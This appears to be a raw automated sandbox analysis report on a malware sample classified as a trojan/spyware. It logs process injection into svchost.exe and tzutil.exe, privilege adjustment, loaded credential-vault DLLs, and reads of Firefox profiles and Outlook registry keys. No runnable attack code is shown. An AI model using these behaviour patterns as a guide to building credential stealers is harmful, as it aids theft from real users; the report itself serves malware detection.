Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031001AA	1_2_031001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F81CC	1_2_030F81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030EF0CC	1_2_030EF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030470C0	1_2_030470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F70E9	1_2_030F70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030FF0E0	1_2_030FF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03064750	1_2_03064750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040770	1_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030FF7B0	1_2_030FF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303C7C0	1_2_0303C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F16CC	1_2_030F16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305C6E0	1_2_0305C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040535	1_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F7571	1_2_030F7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03100591	1_2_03100591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DD5B0	1_2_030DD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030FF43F	1_2_030FF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F2446	1_2_030F2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03031460	1_2_03031460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030EE4F6	1_2_030EE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030FAB40	1_2_030FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030FFB76	1_2_030FFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305FB80	1_2_0305FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F6BD7	1_2_030F6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B5BF0	1_2_030B5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0307DBF9	1_2_0307DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030FFA49	1_2_030FFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F7A46	1_2_030F7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B3A6C	1_2_030B3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303EA80	1_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DDAAC	1_2_030DDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03085AA0	1_2_03085AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030EDAC6	1_2_030EDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03049950	1_2_03049950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305B950	1_2_0305B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03056962	1_2_03056962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030429A0	1_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0310A9A6	1_2_0310A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030AD800	1_2_030AD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03042840	1_2_03042840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304A840	1_2_0304A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030268B8	1_2_030268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030438E0	1_2_030438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306E8F0	1_2_0306E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030FFF09	1_2_030FFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03082F28	1_2_03082F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03060F30	1_2_03060F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B4F40	1_2_030B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03041F92	1_2_03041F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030BEFA0	1_2_030BEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030FFFB1	1_2_030FFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03032FC8	1_2_03032FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030FEE26	1_2_030FEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040E59	1_2_03040E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03052E90	1_2_03052E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030FCE93	1_2_030FCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03049EB0	1_2_03049EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030FEEDB	1_2_030FEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304AD00	1_2_0304AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03043D40	1_2_03043D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F1D5A	1_2_030F1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F7D73	1_2_030F7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03058DBF	1_2_03058DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305FDC0	1_2_0305FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303ADE0	1_2_0303ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040C00	1_2_03040C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B9C32	1_2_030B9C32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E0CB5	1_2_030E0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03030CF2	1_2_03030CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030FFCF2	1_2_030FFCF2
Source: C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe	Code function: 5_2_0124D888	5_2_0124D888
Source: C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe	Code function: 5_2_0124D88A	5_2_0124D88A
Source: C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe	Code function: 5_2_0124F51A	5_2_0124F51A
Source: C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe	Code function: 5_2_0126E43A	5_2_0126E43A
Source: C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe	Code function: 5_2_01257CBA	5_2_01257CBA
Source: C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe	Code function: 5_2_0124D73A	5_2_0124D73A
Source: C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe	Code function: 5_2_0124F73A	5_2_0124F73A
Source: C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe	Code function: 5_2_0125461A	5_2_0125461A
Source: C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe	Code function: 5_2_01255EC5	5_2_01255EC5
Source: C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe	Code function: 5_2_01255ECA	5_2_01255ECA

Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Code function: String function: 00790AE3 appears 70 times
Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Code function: String function: 00777DE1 appears 36 times
Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Code function: String function: 00798900 appears 42 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 030AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0302B970 appears 254 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 030BF290 appears 103 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03075130 appears 36 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03087E54 appears 93 times

Source: gKvjKMCUfq.exe, 00000000.00000003.1717593815.0000000003B4D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs gKvjKMCUfq.exe
Source: gKvjKMCUfq.exe, 00000000.00000003.1717987551.00000000039A3000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs gKvjKMCUfq.exe

Source: gKvjKMCUfq.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/3@10/8

Source: C:\Users\user\Desktop\gKvjKMCUfq.exe

Code function: 0_2_007DA06A GetLastError,FormatMessageW,

0_2_007DA06A

Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Code function: 0_2_007C81CB AdjustTokenPrivileges,CloseHandle,		0_2_007C81CB
Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Code function: 0_2_007C87E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_007C87E1

Source: C:\Users\user\Desktop\gKvjKMCUfq.exe

Code function: 0_2_007DB333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_007DB333

Source: C:\Users\user\Desktop\gKvjKMCUfq.exe

Code function: 0_2_007EEE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_007EEE0D

Source: C:\Users\user\Desktop\gKvjKMCUfq.exe

Code function: 0_2_007E83BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,

0_2_007E83BB

Source: C:\Users\user\Desktop\gKvjKMCUfq.exe

Code function: 0_2_00774E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_00774E89

Source: C:\Users\user\Desktop\gKvjKMCUfq.exe

File created: C:\Users\user\AppData\Local\Temp\aut8EF2.tmp

Jump to behavior

Source: gKvjKMCUfq.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\gKvjKMCUfq.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: tzutil.exe, 00000006.00000002.3552198154.0000000003000000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000006.00000003.2392420803.0000000003000000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: gKvjKMCUfq.exe	Virustotal: Detection: 69%
Source: gKvjKMCUfq.exe	ReversingLabs: Detection: 76%

Source: unknown	Process created: C:\Users\user\Desktop\gKvjKMCUfq.exe "C:\Users\user\Desktop\gKvjKMCUfq.exe"
Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\gKvjKMCUfq.exe"
Source: C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe	Process created: C:\Windows\SysWOW64\tzutil.exe "C:\Windows\SysWOW64\tzutil.exe"
Source: C:\Windows\SysWOW64\tzutil.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\gKvjKMCUfq.exe"	Jump to behavior
Source: C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe	Process created: C:\Windows\SysWOW64\tzutil.exe "C:\Windows\SysWOW64\tzutil.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Section loaded: cryptbase.dll	Jump to behavior

Source: C:\Windows\SysWOW64\tzutil.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\tzutil.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: gKvjKMCUfq.exe

Static file information: File size 1211904 > 1048576

Source: gKvjKMCUfq.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: gKvjKMCUfq.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: gKvjKMCUfq.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: gKvjKMCUfq.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: gKvjKMCUfq.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: gKvjKMCUfq.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: gKvjKMCUfq.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: tzutil.pdbGCTL source: svchost.exe, 00000001.00000003.2176788289.0000000002A26000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2176703777.0000000002A1B000.00000004.00000020.00020000.00000000.sdmp, SUMCVKBWRXks.exe, 00000005.00000003.2280928532.000000000106F000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: SUMCVKBWRXks.exe, 00000005.00000000.2131829694.000000000082E000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: gKvjKMCUfq.exe, 00000000.00000003.1718984241.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, gKvjKMCUfq.exe, 00000000.00000003.1719658891.0000000003880000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2115438341.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2208201359.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2208201359.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2117314744.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000006.00000002.3553514765.00000000035C0000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000006.00000003.2208256467.000000000326C000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000006.00000002.3553514765.000000000375E000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000006.00000003.2210561804.0000000003415000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: gKvjKMCUfq.exe, 00000000.00000003.1718984241.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, gKvjKMCUfq.exe, 00000000.00000003.1719658891.0000000003880000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.2115438341.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2208201359.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2208201359.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2117314744.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000006.00000002.3553514765.00000000035C0000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000006.00000003.2208256467.000000000326C000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000006.00000002.3553514765.000000000375E000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000006.00000003.2210561804.0000000003415000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: SUMCVKBWRXks.exe, 00000005.00000002.3556655023.000000000567C000.00000004.80000000.00040000.00000000.sdmp, tzutil.exe, 00000006.00000002.3553914262.0000000003C2C000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000006.00000002.3552198154.0000000002F7D000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000007.00000002.2504404477.0000000020F0C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: SUMCVKBWRXks.exe, 00000005.00000002.3556655023.000000000567C000.00000004.80000000.00040000.00000000.sdmp, tzutil.exe, 00000006.00000002.3553914262.0000000003C2C000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000006.00000002.3552198154.0000000002F7D000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000007.00000002.2504404477.0000000020F0C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: tzutil.pdb source: svchost.exe, 00000001.00000003.2176788289.0000000002A26000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2176703777.0000000002A1B000.00000004.00000020.00020000.00000000.sdmp, SUMCVKBWRXks.exe, 00000005.00000003.2280928532.000000000106F000.00000004.00000001.00020000.00000000.sdmp

Source: gKvjKMCUfq.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: gKvjKMCUfq.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: gKvjKMCUfq.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: gKvjKMCUfq.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: gKvjKMCUfq.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\gKvjKMCUfq.exe

Code function: 0_2_00774B37 LoadLibraryA,GetProcAddress,

0_2_00774B37

Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Code function: 0_2_0077C4C7 push A30077BAh; retn 0077h	0_2_0077C50D
Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Code function: 0_2_007D848F push FFFFFF8Bh; iretd	0_2_007D8491
Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Code function: 0_2_0079E70F push edi; ret	0_2_0079E711
Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Code function: 0_2_0079E828 push esi; ret	0_2_0079E82A
Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Code function: 0_2_00798945 push ecx; ret	0_2_00798958
Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Code function: 0_2_0079EA03 push esi; ret	0_2_0079EA05
Source: C:\Users\user\Desktop\gKvjKMCUfq.exe	Code function: 0_2_0079EAEC push edi; ret	0_2_0079EAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_026032C0 push eax; ret	1_2_026032C2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0260D352 push dword ptr [ebp-59622DFFh]; iretd	1_2_0260D358
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02614B13 pushad ; iretd	1_2_02614B78
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02614BA2 pushad ; iretd	1_2_02614B78
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02614B85 pushad ; iretd	1_2_02614B78
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02616857 push esp; iretd	1_2_02616858
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0260D8D0 push esp; iretd	1_2_0260D8D1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_026051E6 push esp; retf	1_2_02605205
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02613653 push ebx; retf	1_2_0261369C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_026164A9 push es; retf	1_2_026164BD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02616505 push es; retf	1_2_026164BD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030309AD push ecx; mov dword ptr [esp], ecx	1_2_030309B6
Source: C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe	Code function: 5_2_01257974 push edi; iretd	5_2_01257977
Source: C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe	Code function: 5_2_012579EB pushfd ; iretd	5_2_01257A09
Source: C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe	Code function: 5_2_01255860 push es; retf	5_2_01255874
Source: C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe	Code function: 5_2_012558BC push es; retf	5_2_01255874
Source: C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe	Code function: 5_2_012578E6 push DEA68B5Ah; iretd	5_2_012578EB
Source: C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe	Code function: 5_2_0125836A push ecx; iretd	5_2_0125836B
Source: C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe	Code function: 5_2_01249A17 push cs; ret	5_2_01249A25
Source: C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe	Code function: 5_2_01249A1A push cs; ret	5_2_01249A25
Source: C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe	Code function: 5_2_0124459D push esp; retf	5_2_012445BC
Source: C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe	Code function: 5_2_01255C0E push esp; iretd	5_2_01255C0F
Source: C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe	Code function: 5_2_01253F3C pushad ; iretd	5_2_01253F2F
Source: C:\Program Files (x86)\kwcfuWceSHsvrYeiuOUWuJxLyqxpHMnSJZrDmZfdyJhKVvOolr\SUMCVKBWRXks.exe	Code function: 5_2_01253F59 pushad ; iretd	5_2_01253F2F

